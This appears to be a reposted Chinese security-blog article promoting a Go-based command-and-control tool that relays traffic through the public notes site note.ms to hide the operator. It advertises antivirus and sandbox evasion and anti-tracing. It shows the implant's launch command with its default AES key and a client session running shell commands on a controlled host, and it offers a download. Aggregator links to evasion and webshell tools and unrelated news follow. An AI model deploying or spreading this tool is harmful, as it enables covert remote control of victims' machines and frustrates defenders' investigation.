服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

防溯源!无VPS也可用的C2小工具

日期: 来源:Hack分享吧收集编辑:点击关注 

声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。


现在只对常读和星标的公众号才展示大图推送,建议大家把Hack分享吧“设为星标”,否则可能看不到了!


工具介绍

该工具利用公开笔记本网站作为信息传递的中间服务器,能够让蓝队无法追溯到VPS的位置。该工具未进行免杀处理,也未执行shellcode,仅仅使用了go的os/exec包进行命令执行,并对其采用AES加密。工具能够有效避免被大多数安全设备及态势感知系统发现,同时在多个杀毒软件中免杀。在红队攻防活动中,作者针对需要隐藏C2回连地址及流量的需求,创造了该工具。

← 左右滑动查看更多 →


优点:

具有免杀功能可有效防止被溯源实现了AES加密来保证信息的安全对隐藏位置进行了深度优化能够抵抗沙箱检测


缺点:

返回命令结果的速度较慢功能较少(但敏感功能较少也降低了被检测的风险)


被控端微步在线扫描截图


工具原理

1. 使用公开笔记网站https://note.ms做中间服务器。uri /ba为一个笔记的地址,每个uri都对应一个笔记。


2. 通过笔记本的读写来实现作为被控端和控制端之间的流量传递载体,具体的流程如下图所示:


工具利用

被控端 server
被控端运行以下命令:‍
./server --key notekey --admin ocis

其中有两个参数,为了提高安全性,建议都修改一下:

key:为AES加密的密钥,可自定义密钥,默认密钥为zhu1234554321zhuadmin:控制的uri地址,默认为ocis


控制端 client

1. 控制端刷新在线主机列表
username$ ./client0:主机名:[penetration]  note地址:[BpLnfgDsc3WD9F3qNfHK6a95jjJkwz]       notekey地址:[zhu1234554321zhu]
1.获取在线主机列表(不一定全)2.执行主机命令(需要等待30秒)3.更新别控端列表(需等待30秒)


2. 控制端执行命令

username$ ./client1.获取在线主机列表(不一定全)2.执行主机命令(需要等待30秒)3.更新别控端列表(需等待30秒)
2请输入note地址:BpLnfgDsc3WD9F3qNfHK6a95jjJkwz请输入notekey:BpLnfgDsc3WD9F3qNfHK6a95jjJkwz请输入shell命令:whoami请等待30秒jpass


这里可以看到目标主机是与note.ms建立的连接,而不是与控制端直接进行连接的。


下载地址

点击下方名片进入公众号

回复关键字【230426】获取下载链接



关注公众号回复“1208”可以领取个人常用高效爆破字典,“0221”2020年酒仙桥文章打包,“1212”杀软对比源码+数据源,“0421”Windows提权工具包。


往期推荐工具

渗透测试常用的数据库综合利用工具

RequestTemplate红队内网渗透工具

Railgun - 一款GUI界面的渗透工具

GoBypass - Golang免杀生成工具

ByPassBehinder冰蝎WebShell免杀工具

SweetBabyScan内网资产探测漏扫工具

掩日 - 适用于红队的综合免杀工具

AuxTools浮鱼渗透辅助工具箱V1.0


POCbomber红队快速打点漏洞检测工具

相关阅读

  • 小细节大文明 | 乘坐交通工具礼仪篇

  • “五一”假期将至,市民出行热情高涨,民航、铁路、长途客运和城市公共交通运输需求旺盛,在乘坐交通工具时有哪些需要注意的文明礼仪?今天,文明君邀您一起学习。您懂得,明确行程提
  • 瓜州县持续深化“放管服”改革

  • 凝神谋发展 实干兴陇原 “三抓三促”行动进行时丨乘云而上促发展 优化环境无止境——瓜州县持续深化“放管服”改革今年以来,瓜州县深入贯彻“三抓三促”行动部署要求,持续深
  • 用人单位请注意!社保业务办理有新变化!

  • 因政策调整“亲清在线”平台“行政许可”版块所有事项将分批完成迁移人力社保、医保等部门事项将迁移至其他政务服务系统迁移后的社保业务经办相关问答和操作指南赶紧往下看
  • 轻量级批量 IP 分析工具 (资产、漏洞)

  • 一个命令行工具,用于快速分析文件中的所有 IP,并查看哪些 IP 具有开放端口/漏洞。也可以从 stdin 馈送数据以在数据管道中使用。0x01 工具安装1、获取适用于您的操作系统的最

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四
  • 美国对华2000亿关税清单,到底影响有多大?

  • 1 今天A股大跌,上证最大跌幅超过2%。直接导火索是美国证实计划对华2000亿美元产品加征25%关税。 听起来,2000亿美元数目巨大,我们来算笔账。 2000亿美元,按现在人民币汇率

最新文章

  • 防溯源!无VPS也可用的C2小工具

  • 声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。现在只对常读和星标的公众
  • 吃瓜要当心!黑客利用娱乐热点大肆传播病毒

  • 国内知名安全厂商火绒最近发现,RdPack病毒正在以将文件名伪装成娱乐热点(景甜 张继科聊天记录 曝光.exe)的方式在微信群中大肆传播。经火绒安全人员分析发现,运行病毒后会释放并
  • 年轻人要做就做凤尾

  • 文:蔡垒磊以前读书的时候,老师说,我这个人应该去最好的地方。什么意思呢?我是竞争型人格,我从小在镇上的小学、初中都是最好的班里成绩最好的,但是这个“最好”由于没有其他人再对
  • Esp8266入门即是巅峰

  • esp8266主要用于物联网开发,可配合多种传感器实现我们所需。本文让我们一起走进esp8266的世界吧!esp8266开发线路线路一:掉发型需要自己写相关传感器的代码,解决各种依赖库。需
  • 怪才涂:多干活多尝试多微创新

  • 徒弟尹姐发来反馈,昨天又赚了570+。很多人总是追问,卖的什么产品。好像告诉了他之后,他也可以卖的好一样。很多人还不知道做好项目,需要什么样的条件。十分可笑。不知道条件是什